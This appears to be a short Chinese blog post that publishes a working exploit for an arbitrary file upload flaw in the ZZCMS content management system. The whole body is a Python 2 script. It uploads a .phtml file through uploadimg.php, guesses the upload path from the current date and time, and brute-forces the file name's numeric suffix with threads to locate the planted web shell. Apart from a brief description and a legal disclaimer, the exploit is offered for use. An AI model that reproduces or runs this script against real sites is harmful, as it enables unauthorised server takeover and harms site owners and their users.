站长招商网内容管理系统简称 ZZCMS,由ZZCMS团队开发,融入数据库优化,内容缓存,AJAX等技术,使网站的安全性 、稳定性 、负载能力得到可靠保障。源码开放,功能模块独立,便于二次开发。
zzcms某处过滤不严格,导致可上传任意脚本文件
直接贴出exp
# -*- coding:utf-8 -*- import requests import threading import time import argparse parser = argparse.ArgumentParser() parser.add_argument("-u") args = parser.parse_args() urls = args.u urlib = urls+'uploadimg.php' def B(url): try: if requests.get(url,timeout=3).status_code == 200: lock.acquire() print u"[+++] shell地址:", url lock.release() except: pass def L(url,filename): print u'[+++] ADMINSS:正在尝试上传shell' try: urls = '%s'%url files = {'g_fu_image[]': ('%s'%filename, open('%s'%filename, 'rb'), 'image/jpg', {'Expires': '0'})} r = requests.post(urls, files=files) fname = time.strftime('%Y%m%d%H%M%S',time.localtime(time.time())) froot = '/uploadfiles/'+time.strftime('%Y-%m',time.localtime(time.time()))+'/' upfrt = urls+froot+fname shll = upfrt.replace('uploadimg.php/', '') return shll except: bugs = u'[+++]ERROR:文件上传失败' print bugs print '[+++] ADMINSS:'+urls shel = L(urlib,'1.phtml') shell = shel print u'[+++] ADMINSS:上传成功 正在爆破shell地址' lock = threading.Lock() pool = [] for x in xrange(100, 999): pool.append(threading.Thread(target=B, args=(shell+str(x)+'.phtml',))) if len(pool) > 20 or x == 998: for x in pool: x.start() for x in pool: x.join() pool = []
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论